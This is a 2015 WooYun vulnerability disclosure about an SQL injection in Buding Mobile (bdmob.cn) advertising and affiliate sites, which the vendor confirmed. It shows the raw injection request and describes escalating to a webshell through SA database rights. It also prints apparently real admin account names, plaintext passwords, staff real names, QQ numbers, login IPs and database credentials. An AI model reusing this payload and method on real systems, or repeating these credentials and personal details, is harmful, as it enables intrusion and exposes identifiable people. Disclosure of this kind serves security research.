当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138313

漏洞标题:布丁移动某站SQL注射(沦陷所有上线业务/泄露180W用户手机imei号操作型号/大量内部代理商信息)

相关厂商:bdmob.cn

漏洞作者: 路人甲

提交时间:2015-09-01 14:19

修复时间:2015-10-16 14:24

公开时间:2015-10-16 14:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

布丁移动
布丁移动,北京步鼎方舟科技有限公司,创立于2010年11月,李开复博士创立的创新工场家族成员之一,由清科创投和创新发展基金IWDF联合投资。
布丁移动
布丁移动
布丁移动,专注于移动互联网O2O(Online to Offline)领域,移动互联网时代都市生活服务领军企业,。致力于推动国内移动电子凭证行业发展。休闲、娱乐、餐饮等都市生活服务为主要业务,推出布丁电影票、布丁优惠券、布丁外卖、布丁电影、布丁爱生活、布丁美食、微车等多款应用,支持iPhone和Android两个平台。

详细说明:

首先说明下,这个是干嘛的吧,好像就是在各种APP啊,渠道啊挂广告,靠点击量赚取收益的,比如有些APP会有页面广告,大约就是这样,然后各个公司代理啊,就会注册建立渠道合作,危害还是蛮大的,可以替换部分广告包已达到挂马和别的用途
而且暴露了下载APP的imei
(手机串号)和下载IP时间,手机型号,手机操作平台版本。
各个渠道代理商的分润和结算都能涉及到,
涉及了百度,京东,淘宝,小米,还有很多大厂商渠道 图比较多,审核老大耐心看
POST /do.asp HTTP/1.1
Host: www.wapqq.cn
Content-Length: 42
Accept: */*
Origin: http://www.wapqq.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wapqq.cn/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDQCSSSDQC=LKJNAHEBHOMEKKLNCBIOBENG
action=login&username=aaaa'&password=admin
同IP下一个站点的注入,
这个比较方便,然后SA权限echo写入一句话,上传大马
通过列举数据库发现了大量的数据,
然后依次登录平台,
总结了下主要是可以替换广告包APP挂马,然后泄露了180W用户的手机串号和型号(下载点击广告可以记录用户的手机串号?),
还有就是详细的收支情况

漏洞证明:

caidao.png

222.png

cp.png

kaipiao.png

sp.png

sp1.png

百度.png

百度助手.png

代理商.png

到账.png

到账111.png

工资账号.png

广告wifi.png

广告主.png

开票.png

内部财务.png

渠道.png

渠道1.png

工资账号.png

身份证.png

渠道商.png

淘宝京东.png

通话精力.png

10000000万.png

手机串号

Database: sp
Table: Admin_User
[9 entries]
+-----------+--------------+
| uname     | upwd         |
+-----------+--------------+
| annidao   | 19871013     |
| bink      | bink12345    |
| chenlei   | chenlei12345 |
| devin     | 123456       |
| kangpeng  | kp123456     |
| lenv      | 585858       |
| robin     | 12345        |
| sunlei    | sunlei12345  |
| wsj890817 | 13956655260  |
+-----------+--------------+


mask 区域


*****s_lock	jiaose	las*****
*****22, 23, 24, 25	2013/11/22 14:10:14	False	4	2015/8/25 11*****
*****	2013/11/25 15:11:59	False	4	2015/8/17 15:35:04	222.*****
*****/26 11:09:58	False	4	2015/6/8 13:54:18	222.185.23*****
*****:10	False	5	2015/8/28 15:47:13	222.185.238.*****
*****/6/10 13:29:03	119.123.180.125	1842769410	http://*****
*****5, 26	2013/12/10 12:15:15	False	4	2015/7/15 17:11:46*****
***** 16:30:07	220.165.250.108	674091165	ht*****
*****6	http://s.bdmob.cn/huodong/shuju.asp?hid=226&bid=514&q*****







帐号列表
管理员账号	账户密码	真实姓名	所属用户组	注册时间	最后登陆	最后登陆IP	客服Q Q	操作
 liuling	 123456	 刘羚	 商务	 2014/10/8 15:28:03	 2015/8/17 15:01:21	 222.185.238.130	 1169693696
 robin	 robin2013	 刘利斌	 管理员	 2014/9/10 13:14:23	 2015/7/2 16:30:07	 220.165.250.108	 674091165	 修改   删除
 kangpeng	 kp123456	 康鹏	 管理员	 2013/12/10 12:15:15	 2015/7/15 17:11:46	 222.185.238.130	 35331570	 修改   删除
 wendy	 123456	 杨晓婉	 推广	 2013/12/9 18:05:57	 2015/6/10 13:29:03	 119.123.180.125	 1842769410	 修改   删除
 annidao	 19871013	 王芳	 行政	 2013/11/28 16:05:10	 2015/8/28 15:47:13	 222.185.238.130	 578105779	 修改   删除
 bink	 bink131623	 许斌	 管理员	 2013/11/26 11:09:58	 2015/6/8 13:54:18	 222.185.238.130	 1957414736	 修改   删除
 devin	 123456	 申龙	 管理员	 2013/11/25 15:11:59	 2015/8/31 11:48:22	 27.223.16.10	 516615050	 修改   删除
 wsj890817	 13956655260	 吴胜杰	 管理员	 2013/11/22 14:10:14	 2015/8/25 11:18:14	 222.185.238.130	 470642450
 * 定义数据库配置参数
 */
// 数据库host名称
define('DB_HOST', '127.0.0.1');
// 数据库用户名
define('DB_USERNAME', 'root');
//数据库密码
define('DB_PASS', '55tdm5ys');
//数据库
define('DB_DBNAME', 'appcms');
//数据库编码
define('DB_CHARSET', 'utf8');
//表名前缀
define('TB_PREFIX', 'appcms_');
sa 12345

部分生产环境信息

http://apkzn.com 【无标题文档】
http://www.bdmob.cn 【布丁无线移动营销服务平台】
http://www.apr-ifgc.com 【APR品牌优势|刷ECU|升级ECU|刷APR,MTM,GIAC,HPA ...】
http://wapqq.cn 【塞班手机软件园】
http://bdmob.cn 【联系我们-布丁无线移动营销服务平台】
http://tptx.cn 【图片天下(tptx.cn)-美女高清图片网站-唯美非主流图片 ...-丝袜 …】
http://45pic.com 【MTK跳转统计】
http://a.bdmob.cn 【布丁安卓市场-bdmarket-安卓(Android)手机应用软件|游戏下载】
http://app.bdmob.cn 【布丁安卓市场-bdmarket-安卓手机应用软件】
http://www.tptx.cn 【赵柯展示妩媚时尚高清写真 - 图片天下(tptx.cn)-美女高清 ...】
http://wapfm.com 【游戏-塞班手机软件园】
http://www.wapfm.com 【一键破解QQ免费刷钻刷Q币-塞班手机软件园】

受影响站点信息

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-01 14:22

厂商回复:

感谢作者提交的漏洞,幸亏没落到坏人手里

最新状态:

暂无

漏洞评价:

评论